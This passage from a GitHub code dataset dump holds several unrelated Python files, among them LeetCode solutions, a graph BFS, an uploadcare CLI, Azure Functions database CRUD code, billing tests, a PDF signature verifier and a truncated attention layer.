mcpdft_grad.Gradients.project_Aop\n\n","repo_name":"stknecht/mrh","sub_path":"my_pyscf/df/grad/dfmcpdft.py","file_name":"dfmcpdft.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"36876732788","text":"\"\"\"Given an integer array nums and an integer k, return the k most frequent elements. You may return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [1,1,1,2,2,3], k = 2\nOutput: [1,2]\nExample 2:\n\nInput: nums = [1], k = 1\nOutput: [1]\"\"\"\n\n\nclass Solution:\n def topKFrequent(self, nums, k):\n map = Counter(nums)\n result = [] # [num , count]\n for key, value in map.items():\n result.append([key, value])\n result.sort(key=lambda x: x[1], reverse=True)\n\n return [res[0] for res in result[:k]]\n\n","repo_name":"mageshyt/leetcode-solutions","sub_path":"Heap/347. Top K Frequent Elements.py","file_name":"347. 
Top K Frequent Elements.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35987190214","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\ndef cut_rod(price, length):\n value = [0 for n in range(length+1)]\n value[0] = 0\n \n for i in range(1, length+1):\n max_value = -32000\n \n for j in range(i):\n max_value = max(max_value, price[j] + value[i-j-1])\n value[i] = max_value\n \n return value[length] \n \n \n#main code\nn = int(input(\"\"))\ntest_arr = list(map(int,input(\"\").strip().split()))[:n]\nsize = len(test_arr)\nprint(str(cut_rod(test_arr, size)))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Rostamnezhad/cutting_rod","sub_path":"cutting_rod (1).py","file_name":"cutting_rod (1).py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30266751808","text":"#!/usr/bin/python\n# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\n\nfrom pyuploadcare import __version__, conf\nfrom pyuploadcare.client import Uploadcare\nfrom pyuploadcare.exceptions import UploadcareException\nfrom pyuploadcare.ucare_cli.commands import (\n convert_document,\n convert_video,\n create_group,\n create_webhook,\n delete_files,\n delete_webhook,\n get_file,\n get_project,\n list_files,\n list_groups,\n list_webhooks,\n store_files,\n sync,\n update_webhook,\n upload,\n upload_from_url,\n)\nfrom pyuploadcare.ucare_cli.commands.helpers import pprint\nfrom pyuploadcare.ucare_cli.settings import load_config\n\n\nlogger = logging.getLogger(\"pyuploadcare\")\n\n\ndef ucare_argparser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--version\", action=\"version\", version=\"ucare {0}\".format(__version__)\n )\n\n subparsers = parser.add_subparsers()\n\n list_files.register_arguments(subparsers)\n list_groups.register_arguments(subparsers)\n get_file.register_arguments(subparsers)\n store_files.register_arguments(subparsers)\n delete_files.register_arguments(subparsers)\n upload_from_url.register_arguments(subparsers)\n upload.register_arguments(subparsers)\n sync.register_arguments(subparsers)\n create_group.register_arguments(subparsers)\n convert_video.register_arguments(subparsers)\n get_project.register_arguments(subparsers)\n convert_document.register_arguments(subparsers)\n list_webhooks.register_arguments(subparsers)\n delete_webhook.register_arguments(subparsers)\n create_webhook.register_arguments(subparsers)\n update_webhook.register_arguments(subparsers)\n\n # common arguments\n parser.add_argument(\n \"--pub_key\",\n help=\"API key, if not set is read from uploadcare.ini\"\n \" and ~/.uploadcare config files\",\n )\n parser.add_argument(\n \"--secret\",\n help=\"API secret, if not set is read from uploadcare.ini\"\n \" and ~/.uploadcare config files\",\n )\n parser.add_argument(\n \"--api_base\",\n help=\"API url, can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\"\n \" Default value is {0}\".format(conf.api_base),\n )\n parser.add_argument(\n \"--upload_base\",\n help=\"Upload API url, can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\"\n \" Default value is {0}\".format(conf.upload_base),\n )\n parser.add_argument(\n \"--no_check_upload_certificate\",\n action=\"store_true\",\n help=\"Don't check the uploading API server certificate.\"\n \" Can be read from uploadcare.ini\"\n \" 
and ~/.uploadcare config files.\",\n )\n parser.add_argument(\n \"--no_check_api_certificate\",\n action=\"store_true\",\n help=\"Don't check the REST API server certificate.\"\n \" Can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\",\n )\n parser.add_argument(\n \"--api_version\",\n help=\"API version, can be read from uploadcare.ini\"\n \" and ~/.uploadcare config files.\"\n \" Default value is {0}\".format(conf.api_version),\n )\n\n return parser\n\n\ndef main( # noqa: C901\n arg_namespace=None, config_file_names=(\"~/.uploadcare\", \"uploadcare.ini\")\n):\n if arg_namespace is None:\n arg_namespace = ucare_argparser().parse_args()\n\n conf = load_config(arg_namespace, config_file_names)\n\n client = Uploadcare(**conf)\n\n if hasattr(arg_namespace, \"func\"):\n try:\n arg_namespace.func(arg_namespace, client)\n except UploadcareException as exc:\n pprint(\"ERROR: {0}\".format(exc))\n\n\nif __name__ == \"__main__\":\n ch = logging.StreamHandler()\n fmt = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n ch.setFormatter(fmt)\n logger.addHandler(ch)\n logger.setLevel(logging.INFO)\n\n main()\n","repo_name":"uploadcare/pyuploadcare","sub_path":"pyuploadcare/ucare_cli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"66"} +{"seq_id":"9834934889","text":"\r\nclass Graph:\r\n def __init__(self,nVertices):\r\n self.nVertices = nVertices\r\n self.adjMatrix = [[0 for i in range(nVertices)]for j in range(nVertices)]\r\n\r\n def addEdge(self,v1,v2):\r\n self.adjMatrix[v1][v2] = 1\r\n self.adjMatrix[v2][v1] = 1\r\n\r\n def removeEdge(self,v1,v2):\r\n if self.containsEdge(v1,v2) is False:\r\n return 'Edge is absent'\r\n self.adjMatrix[v1][v2] = 0\r\n self.adjMatrix[v2][v1] = 0\r\n return 'removed'\r\n\r\n def containsEdge(self,v1,v2):\r\n return True if self.adjMatrix[v1][v2] > 0 else False\r\n\r\n def BFS(self):\r\n import queue\r\n q = queue.Queue()\r\n\r\n q.put(0)\r\n visited = [False]*self.nVertices\r\n visited[0] = True\r\n\r\n while q.empty() is False:\r\n sv = q.get()\r\n print(sv,end=' ')\r\n for i in range(self.nVertices):\r\n if self.containsEdge(sv,i) > 0 and visited[i] is False:\r\n q.put(i)\r\n visited[i] = True\r\n\r\n return\r\n\r\n def takeinputGraph(self,E):\r\n\r\n for i in range(E):\r\n l = [int(ele) for ele in input().split()]\r\n i = 0\r\n j = 1\r\n if len(l) <= 1:\r\n break\r\n g.addEdge(l[i],l[j])\r\n\r\ninputlist = [int(ele) for ele in input().split()]\r\nV,E = inputlist[0],inputlist[1]\r\n\r\ng = Graph(V)\r\ng.takeinputGraph(E)\r\ng.BFS()\r\n\r\n\r\n'''g = Graph(7)\r\ng.addEdge(0,1)\r\ng.addEdge(0,2)\r\ng.addEdge(1,3)\r\ng.addEdge(1,4)\r\ng.addEdge(2,6)\r\ng.addEdge(4,5)\r\ng.addEdge(5,6)\r\n'''\r\n","repo_name":"Jashwanth-k/Data-Structures-and-Algorithms","sub_path":"11. 
Graphs/BFS code .py","file_name":"BFS code .py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15813720820","text":"#!/usr/bin/python\nimport azure.functions as func\nimport psycopg2\nfrom datetime import datetime, date\nimport logging\nimport os\n\n\n# DB Queries\n# GET data\nGET_ALL_USER_STATUS = \"SELECT * FROM user_status LIMIT %s OFFSET %s;\"\nGET_ALL_USER_STATUS_WITH_MANAGER = \"\"\"\nSELECT \nus.user_status_id,\nus.domain_rhonda_id, \nCONCAT_WS(' ',u.first_name, u.last_name) AS employee, \nCONCAT_WS(' ', u2.first_name, u2.last_name) AS manager,\nus.status, \nus.employee_environment, \nus.department, \nus.work_type, \nus.work_location, \nus.gender, \nus.birth_date, \nus.start_date, \nus.end_date \nFROM user_status us \nLEFT JOIN public.user u\nON us.domain_rhonda_id = u.domain_rhonda_id\nLEFT JOIN public.user u2\nON us.manager_id = u2.domain_rhonda_id\nLEFT JOIN user_info ui \nON us.manager_id = ui.domain_rhonda_id \nWHERE us.status LIKE %s and us.employee_environment LIKE %s\nLIMIT %s OFFSET %s;\"\"\"\nGET_USER_STATUS_BY_DOMAIN_RHONDA_ID = \"\"\"SELECT * FROM user_status\nWHERE user_status.domain_rhonda_id = %s;\"\"\"\nCOUNT_USER_STATUS_ROWS = \"SELECT COUNT(*) FROM user_status;\"\n\n# INSERT data\nINSERT_USER_STATUS = \"\"\"INSERT INTO user_status (domain_rhonda_id, status, employee_environment, department, work_type, manager_id, work_location, gender, birth_date, start_date, end_date)\nVALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT (domain_rhonda_id) DO NOTHING\nRETURNING domain_rhonda_id;\"\"\"\n\n# UPDATE data\n# Need COALESCE() function here for only updating the distinc value of column that already have value existed\n# Example: column = COALESCE(%s,column) \nUPDATE_USER_STATUS = \"\"\"UPDATE user_status\nSET status = COALESCE(%s,status),,\nemployee_environment = COALESCE(%s,employee_environment),\ndepartment = COALESCE(%s,department),\nwork_type = COALESCE(%s,work_type),\nmanager_id = COALESCE(%s,manager_id),\nwork_location = COALESCE(%s,work_location),\ngender = COALESCE(%s,gender),\nbirth_date = COALESCE(%s,birth_date),\nstart_date = COALESCE(%s,start_date),\nend_date = COALESCE(%s,end_date),\nWHERE domain_rhonda_id = %s\nRETURNING domain_rhonda_id;\n\"\"\"\n\n# DELETE data\nDELETE_USER_STATUS = \"\"\"DELETE FROM user_status\nWHERE domain_rhonda_id = %s\nRETURNING domain_rhonda_id;\n\"\"\"\n\n\n# DB Connection\ndef connection():\n \"\"\"Connect to the PostgreSQL database server\"\"\"\n try:\n\n HOST = os.environ[\"RP_HOST\"]\n DATABASE = os.environ[\"RP_DATABASE\"]\n USERNAME = os.environ[\"RP_USERNAME\"]\n PASSWORD = os.environ[\"RP_PASSWORD\"]\n\n conn = psycopg2.connect(host=HOST, database=DATABASE, user=USERNAME, password=PASSWORD)\n return conn\n\n except (Exception, psycopg2.DatabaseError) as error:\n logging.error(\"DB Connection Exception:\")\n logging.error(error)\n return None\n\n\nconnection = connection()\n\n# Functions\n\n\ndef date_converter(obj):\n \"\"\"Transform date to str. If there is no date it will return 1900-01-01\n\n Args:\n obj ([date]): date\n\n Returns:\n [str]: date as string\n \"\"\"\n if isinstance(obj, date):\n return obj.strftime(\"%Y-%m-%d\")\n return \"1900-01-01\"\n\n\ndef datetime_converter(obj):\n \"\"\"Transform datetime to str. 
If there is no date it will return 1900-01-01T00:00:00\n\n Args:\n obj ([datetime]): datetime\n\n Returns:\n [str]: datetime as string\n \"\"\"\n if isinstance(obj, datetime):\n return obj.strftime(\"%Y-%m-%dT%H:%M:%S\")\n return \"1900-01-01T00:00:00\"\n\n\ndef get_all_user_status(page_size, page):\n \"\"\"This function will return data from user_status table.\n Size will be defined by page_size and it will depen on page number.\n\n Returns:\n [list]: user_status data depending on page and page_size.\n \"\"\"\n try:\n user_status_data = []\n\n page = int(page) - 1\n offset = int(page_size) * int(page)\n\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(GET_ALL_USER_STATUS, (page_size, offset))\n results = cursor.fetchall()\n if not results:\n logging.info(f\"message: There is no results for all users status.\")\n return {}\n for row in results:\n user_status = {\n \"user_status_id\": row[0],\n \"domain_rhonda_id\": row[1],\n \"status\": row[2],\n \"employee_environment\": row[3],\n \"department\": row[4],\n \"work_type\": row[5],\n \"manager_id\": row[6],\n \"work_location\": row[7],\n \"gender\": row[8],\n \"birth_date\": date_converter(row[9]),\n \"start_date\": date_converter(row[10]),\n \"end_date\": date_converter(row[11]),\n \"created_at\": datetime_converter(row[12]),\n \"updated_at\": datetime_converter(row[13]),\n }\n user_status_data.append(user_status)\n return user_status_data\n except Exception as error:\n logging.error(\"Error: SELECT all user_status exception!\")\n logging.error(error)\n logging.error(\"Error: SELECT all user_status exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef get_user_status_by_domain_rhonda_id(domain_rhonda_id):\n \"\"\"This function will return all data from user_status table filtered by domain_rhonda_id.\n\n Returns:\n [list]: All user_status data filtered by domain_rhonda_id.\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(GET_USER_STATUS_BY_DOMAIN_RHONDA_ID, (domain_rhonda_id,))\n results = cursor.fetchall()\n if not results:\n logging.info(f\"message: There is no result for domain_rhonda_id: {domain_rhonda_id}\")\n return {}\n for row in results:\n user_status = {\n \"user_status_id\": row[0],\n \"domain_rhonda_id\": row[1],\n \"status\": row[2],\n \"employee_environment\": row[3],\n \"department\": row[4],\n \"work_type\": row[5],\n \"manager_id\": row[6],\n \"work_location\": row[7],\n \"gender\": row[8],\n \"birth_date\": date_converter(row[9]),\n \"start_date\": date_converter(row[10]),\n \"end_date\": date_converter(row[11]),\n \"created_at\": datetime_converter(row[12]),\n \"updated_at\": datetime_converter(row[13]),\n }\n return user_status\n except Exception as error:\n logging.error(\"Error: SELECT user_status by domain_rhonda_id exception!\")\n logging.error(error)\n logging.error(\"Error: SELECT user_status by domain_rhonda_id exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef get_all_user_status_with_manager(status_param, employee_environment_param, page_size, page):\n \"\"\"This function will return data from user_status table with manager name.\n Size will be defined by page_size and it will depen on page number.\n\n Returns:\n [list]: user_status data depending on page and page_size.\n \"\"\"\n try:\n user_status_manager_data = []\n\n page = int(page) - 1\n offset = int(page_size) * int(page)\n\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(\n GET_ALL_USER_STATUS_WITH_MANAGER, (status_param, 
employee_environment_param, page_size, offset)\n )\n results = cursor.fetchall()\n if not results:\n logging.info(f\"message: There is no results for all users status with manager.\")\n return {}\n for row in results:\n user_status_with_manager = {\n \"user_status_id\": row[0],\n \"domain_rhonda_id\": row[1],\n \"employee\": row[2],\n \"manager\": row[3],\n \"status\": row[4],\n \"employee_environment\": row[5],\n \"department\": row[6],\n \"work_type\": row[7],\n \"work_location\": row[8],\n \"gender\": row[9],\n \"birth_date\": date_converter(row[10]),\n \"start_date\": date_converter(row[11]),\n \"end_date\": date_converter(row[12]),\n }\n user_status_manager_data.append(user_status_with_manager)\n return user_status_manager_data\n except Exception as error:\n logging.error(\"Error: SELECT all user_status with manager exception!\")\n logging.error(error)\n logging.error(\"Error: SELECT all user_status with manager exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef add_user_status(\n domain_rhonda_id,\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n):\n \"\"\"This function will insert new data in user_status table in DB if not already exists. If alredy exists it won't do anything.\n\n Args:\n domain_rhonda_id ([str]): unique domain_rhonda_id\n status ([str]): It can be only Active or Termiated\n employee_environment ([str]): It can be only Internal, External or Other(defualt).\n department ([str]): Any string value, it can be null\n work_type ([str]): It can be only Permanent(default), Temporary or Contract.\n manager_id([str]): It can be null. This is domain_rhonda_id.\n work_location ([str]): It can null but only be Canada, USA or EU.\n gender ([str]): It can be null but only Male, Female or Intersex.\n birth_date ([str]): \"YYYY-MM-DD\" format, it can be null\n start_date ([str]): \"YYYY-MM-DD\" format, it can be null\n end_date ([str]): \"YYYY-MM-DD\" format, it can be null\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(\n INSERT_USER_STATUS,\n (\n domain_rhonda_id,\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n ),\n )\n return f\"{cursor.fetchone()[0]} has been added successfully!\"\n except Exception as error:\n logging.error(\"Error: INSERT user_status exception!\")\n logging.error(error)\n logging.error(\"Error: INSERT user_status exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef update_user_status(\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n domain_rhonda_id,\n):\n \"\"\"This function will update data in user_status table in DB by domain_rhonda_id.\n\n Args:\n domain_rhonda_id ([str]): unique domain_rhonda_id\n status ([str]): It can be only Active or Termiated\n employee_environment ([str]): It can be only Internal, External or Other(defualt).\n department ([str]): Any string value, it can be null\n work_type ([str]): It can be only Permanent(default), Temporary or Contract.\n manager_id([str]): It can be null. 
This is domain_rhonda_id.\n work_location ([str]): It can null but only be Canada, USA or EU.\n gender ([str]): It can be null but only Male, Female or Intersex.\n birth_date ([str]): \"YYYY-MM-DD\" format, it can be null\n start_date ([str]): \"YYYY-MM-DD\" format, it can be null\n end_date ([str]): \"YYYY-MM-DD\" format, it can be null\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(\n UPDATE_USER_STATUS,\n (\n status,\n employee_environment,\n department,\n work_type,\n manager_id,\n work_location,\n gender,\n birth_date,\n start_date,\n end_date,\n domain_rhonda_id,\n ),\n )\n\n return f\"{cursor.fetchone()[0]} has been updated successfully!\"\n except Exception as error:\n logging.error(\"Error: UPDATE user_status exception!\")\n logging.error(error)\n logging.error(\"Error: UPDATE user_status exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef count_user_status_rows():\n \"\"\"Count rows in DB.\n\n Returns:\n [int]: Number of rows in db.\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(COUNT_USER_STATUS_ROWS)\n return cursor.fetchall()[0][0]\n except Exception as error:\n logging.error(\"Error: count_user_status_rows exception!\")\n logging.error(error)\n logging.error(\"Error: count_user_status_rows exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef user_status_max_page(page_size):\n \"\"\"Depending on page_size we will get number of pages.\n\n Args:\n page_size ([int]): Number of rows per page.\n\n Returns:\n [int]: Number of pages\n \"\"\"\n try:\n total_rows = int(count_user_status_rows())\n if total_rows % int(page_size) != 0:\n max_page = int(total_rows / int(page_size)) + 1\n else:\n max_page = int(total_rows / int(page_size))\n\n return max_page\n except Exception as error:\n logging.error(\"Error: user_status_max_page exception!\")\n logging.error(error)\n logging.error(\"Error: user_status_max_page exception end\")\n return func.HttpResponse(f\"{error}\")\n\n\ndef delete_user_status(domain_rhonda_id):\n \"\"\"This will delete user_status by domain_rhonda_id\n\n Args:\n domain_rhonda_id ([str]): domain_rhonda_id\n\n Returns:\n [str]: domain_rhonda_id that has been deleted.\n \"\"\"\n try:\n with connection:\n with connection.cursor() as cursor:\n cursor.execute(DELETE_USER_STATUS, (domain_rhonda_id,))\n print(f\"Delete cursor: {cursor.fetchone()[0]}\")\n except Exception as error:\n logging.error(\"Error: DELETE user_status by domain_rhonda_id exception!\")\n logging.error(error)\n logging.error(\"Error: DELETE user_status by domain_rhonda_id exception end\")\n return func.HttpResponse(f\"{error}\")\n","repo_name":"Monbert/API_template","sub_path":"user_status/user_status_functions.py","file_name":"user_status_functions.py","file_ext":"py","file_size_in_byte":15140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33606201272","text":"import datetime as dt\n\nimport psycopg2\nimport pytest\n\n\nfrom tests_billing_subventions_x import dbhelpers\nfrom tests_billing_subventions_x import types\n\nINTERNAL_DRAFT_ID = 'e12d920f0a0839f3743b38ffe28747cd'\nSUBDRAFTS = {'from': '1', 'to': '1'}\nRULE_ID = 'c64b2937-e5c3-4b61-a1e4-3aef0c76d134'\n\nMOCK_NOW = '2022-07-05T18:12:34.567890+03:00'\n\n\n@pytest.mark.now(MOCK_NOW)\nasync def test_stq_approve_rules_rescheduled_when_draft_not_ready(\n stq_runner, stq, with_draft,\n):\n with_draft(draft_id=None)\n await _run(stq_runner)\n queue = 
stq.billing_subventions_x_approve_rules\n assert queue.times_called == 1\n task = queue.next_call()\n assert task['id'] == 'id'\n eta = dt.datetime.fromisoformat(MOCK_NOW) + dt.timedelta(seconds=10)\n assert task['eta'] == eta.astimezone(dt.timezone.utc).replace(tzinfo=None)\n\n\n@pytest.mark.now(MOCK_NOW)\n@pytest.mark.config(\n BILLING_SUBVENTIONS_BULK_DRAFTS_CONTROL={'approve_max_reschedules': 2},\n)\nasync def test_stq_approve_rules_stops_when_rescheduling_limit_reached(\n stq_runner, stq, with_draft,\n):\n with_draft(draft_id=None)\n await _run(stq_runner, reschedule_counter=2)\n assert stq.billing_subventions_x_approve_rules.times_called == 0\n\n\n@pytest.mark.now(MOCK_NOW)\nasync def test_stq_approve_rules_splits_draft_to_chunks(\n stq_runner, stq, with_draft,\n):\n with_draft()\n await _run(stq_runner)\n queue = stq.billing_subventions_x_approve_rules\n assert queue.times_called == 1\n task = queue.next_call()\n assert task['id'] == f'{INTERNAL_DRAFT_ID}:1-1'\n assert task['kwargs']['internal_draft_id'] == INTERNAL_DRAFT_ID\n assert task['kwargs']['subdrafts'] == SUBDRAFTS\n eta = dt.datetime.fromisoformat(MOCK_NOW) + dt.timedelta(seconds=30)\n assert task['eta'] == eta.astimezone(dt.timezone.utc).replace(tzinfo=None)\n\n\nasync def test_stq_approve_rules_creates_consistent_rules(\n stq_runner, pgsql, with_draft, mark_as_applying,\n):\n draft = with_draft()\n mark_as_applying(draft['internal_draft_id'], 'draft_id', 'budget_id')\n await _run(stq_runner, subdrafts=SUBDRAFTS)\n rule = dbhelpers.get_rule_by_id(pgsql, RULE_ID)\n rule.pop('updated_at')\n assert rule == {\n 'branding': 'sticker',\n 'budget_id': 'budget_id',\n 'counters_mapping': [{'global': 'draft_id:A', 'local': 'A'}],\n 'currency': 'RUB',\n 'draft_id': 'draft_id',\n 'ends_at': dt.datetime.fromisoformat('2021-06-01T00:00:00+03:00'),\n 'geoarea': 'pol-1',\n 'min_activity_points': 75,\n 'rates': {\n 'schedule': [\n {'counter': 'A', 'start': '00:00', 'week_day': 'mon'},\n ],\n 'steps': [{'id': 'A', 'steps': [{'amount': '100', 'nrides': 10}]}],\n },\n 'id': RULE_ID,\n 'type': 'goal',\n 'schedule_ref': 'schedule_ref_000001',\n 'starts_at': dt.datetime.fromisoformat('2021-05-01T00:00:00+03:00'),\n 'tag': 'a_tag',\n 'stop_tag': None,\n 'tariff': 'comfort',\n 'zone': 'g1',\n 'unique_driver_id': '511476f9-e08a-4826-b925-162578f12ab1',\n 'window_size': 7,\n }\n _assert_schedule_for_rule(pgsql, RULE_ID)\n\n\nasync def test_stq_approve_rules_run_twice(\n stq_runner, pgsql, with_draft, mark_as_applying,\n):\n draft = with_draft()\n mark_as_applying(draft['internal_draft_id'], 'draft_id', 'budget_id')\n await _run(stq_runner, subdrafts=SUBDRAFTS)\n await _run(stq_runner, subdrafts=SUBDRAFTS)\n _assert_schedule_for_rule(pgsql, RULE_ID)\n\n\ndef _assert_schedule_for_rule(pgsql, rule_id):\n schedule = dbhelpers.get_schedule_by_id(pgsql, rule_id)\n assert schedule == [\n types.ScheduleRange(\n during=psycopg2.extras.NumericRange(0, 10080, '[)'), value='A',\n ),\n ]\n\n\nasync def _run(stq_runner, **kwargs):\n kwargs.setdefault('internal_draft_id', INTERNAL_DRAFT_ID)\n await stq_runner.billing_subventions_x_approve_rules.call(\n task_id='id',\n reschedule_counter=kwargs.pop('reschedule_counter', 0),\n kwargs=kwargs,\n )\n\n\n@pytest.fixture(name='with_draft')\ndef _make_draft(create_drafts, a_draft, a_subdraft, a_goal, load_json):\n def _builder(*, draft_id='draft_id'):\n spec = load_json('bulk_personal_goals_spec1.json')\n draft = a_draft(\n internal_draft_id=INTERNAL_DRAFT_ID,\n draft_id=draft_id,\n spec={},\n 
subdrafts=[a_subdraft(spec_ref='1', spec=spec, is_completed=True)],\n rules=[\n a_goal(\n id=RULE_ID,\n geonode=spec['zones'][0],\n tariff_class=spec['tariff_classes'][0],\n start=spec['rule']['start'],\n end=spec['rule']['end'],\n counters=spec['rule']['counters'],\n tag=spec['rule']['tag'],\n geoarea=spec['geoareas'][0],\n branding=spec['rule']['branding_type'],\n points=spec['rule']['activity_points'],\n currency=spec['rule']['currency'],\n window_size=spec['rule']['window'],\n unique_driver_id=spec['rule']['unique_driver_id'],\n schedule_ref='schedule_ref_000001',\n ),\n ],\n schedule_spec=[\n {\n 'schedule_ref': 'schedule_ref_000001',\n 'during': psycopg2.extras.NumericRange(0, 10080, '[)'),\n 'value': 'A',\n },\n ],\n )\n create_drafts(draft)\n return draft\n\n return _builder\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_billing_subventions_x/test_stq_approve_rules.py","file_name":"test_stq_approve_rules.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5861514370","text":"\"\"\"\nThis code reads a PDF, and either verifies or falsifies it as an ordinance\nissued by the Chancellor.\n\"\"\"\n\n# Standard imports.\nfrom dataclasses import dataclass\n\n# Non-standard imports.\nfrom pdfrw import PdfReader\n\n# Local imports.\nfrom .configs import DEFAULT_PATH_TO_PUBLIC_KEY\nfrom .digistamp import Verifier\nfrom .ordinance import Ordinance\nfrom .utils import get_hash_of_ordinance\n\n##############\n# MAIN CLASS #\n##############\n\n@dataclass\nclass PDFVerifier:\n \"\"\" The class in question. \"\"\"\n # Object attributes.\n path_to_pdf: str = None\n path_to_public_key: str = DEFAULT_PATH_TO_PUBLIC_KEY\n trailer: PdfReader = None\n verifier: Verifier = None\n ordinance: Ordinance = None\n hash: str = None\n stamp: str = None\n last_exception: Exception = None\n debug: bool = True\n\n def __post_init__(self):\n self.trailer = PdfReader(self.path_to_pdf)\n self.verifier = Verifier(path_to_public_key=self.path_to_public_key)\n\n def load_ordinance(self):\n \"\"\" Load the ordinance's data from the trailer. \"\"\"\n self.ordinance = Ordinance()\n self.ordinance.load_from_trailer(self.trailer)\n\n def load_hash(self):\n \"\"\" Load the hash from the trailer. \"\"\"\n if not self.trailer.Info.hash:\n raise PDFVerifierError(\"Missing hash.\")\n my_buffer = self.trailer.Info.hash\n self.hash = my_buffer[1:-1]\n\n def load_stamp(self):\n \"\"\" Load the stamp from the trailer. \"\"\"\n if not self.trailer.Info.stamp:\n raise PDFVerifierError(\"Missing stamp.\")\n my_buffer = self.trailer.Info.stamp\n self.stamp = my_buffer[1:-1]\n\n def check_hash(self):\n \"\"\" Check that the hash is what it's supposed to be, given the\n ordinance's data. \"\"\"\n intended_hash = get_hash_of_ordinance(self.ordinance)\n if self.hash != intended_hash:\n raise PDFVerifierError(\"Failed to verify hash.\")\n\n def check_stamp(self):\n \"\"\" Verify the stamp against the hash. \"\"\"\n if not self.verifier.verify(self.hash, self.stamp):\n raise PDFVerifierError(\"Failed to verify stamp.\")\n\n def verify(self):\n \"\"\" Carry out all the checks. 
\"\"\"\n try:\n self.load_ordinance()\n self.load_hash()\n self.load_stamp()\n self.check_hash()\n self.check_stamp()\n except PDFVerifierError as my_exception:\n self.last_exception = my_exception\n if self.debug:\n print(my_exception)\n return False\n return True\n\n################\n# HELPER CLASS #\n################\n\nclass PDFVerifierError(Exception):\n \"\"\" A custom exception. \"\"\"\n","repo_name":"tomhosker/chancery_b","sub_path":"source/pdf_verifier.py","file_name":"pdf_verifier.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41376806960","text":"class Solution:\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if str(x) == str(x)[::-1]:\n return True\n return False\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n x = int(line);\n \n ret = Solution().isPalindrome(x)\n\n out = (ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"ms-darshan/Competative-Programming","sub_path":"palindromeNumbr.py","file_name":"palindromeNumbr.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17629309422","text":"#!/usr/bin/env python3\n\"\"\"Multi Head Attentionr\"\"\"\n\n\nimport tensorflow as tf\nsdp_attention = __import__('5-sdp_attention').sdp_attention\n\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n \"\"\"Calculate multi-head attention for a transformer\"\"\"\n\n def __init__(self, dm, h):\n \"\"\"Constructor\n Args:\n dm is an integer representing the dimensionality of the model\n h is an integer representing the number of heads\n public instance attributes\n h - the number of heads\n dm - the dimensionality of the model\n depth - the depth of each attention head\n Wq - a Dense layer with dm units, used to generate the query matrix\n Wk - a Dense layer with dm units, used to generate the key matrix\n Wv - a Dense layer with dm units, used to generate the value matrix\n linear - a Dense layer with dm units, used to generate the\n attention output\n \"\"\"\n super(MultiHeadAttention, self).__init__()\n self.h = h\n self.dm = dm\n self.depth = dm // self.h\n self.Wq = tf.keras.layers.Dense(dm)\n self.Wk = tf.keras.layers.Dense(dm)\n self.Wv = tf.keras.layers.Dense(dm)\n self.linear = tf.keras.layers.Dense(dm)\n\n def split_heads(self, x, batches):\n \"\"\"Split the last dimension into (num_heads, depth).\n \"\"\"\n rb = tf.reshape(x, (batches, -1, self.h, self.depth))\n return tf.transpose(rb, perm=[0, 2, 1, 3])\n\n def call(self, Q, K, V, mask):\n \"\"\"Keras layer call\"\"\"\n batch_size = tf.shape(Q)[0]\n\n Q = self.Wq(Q)\n K = 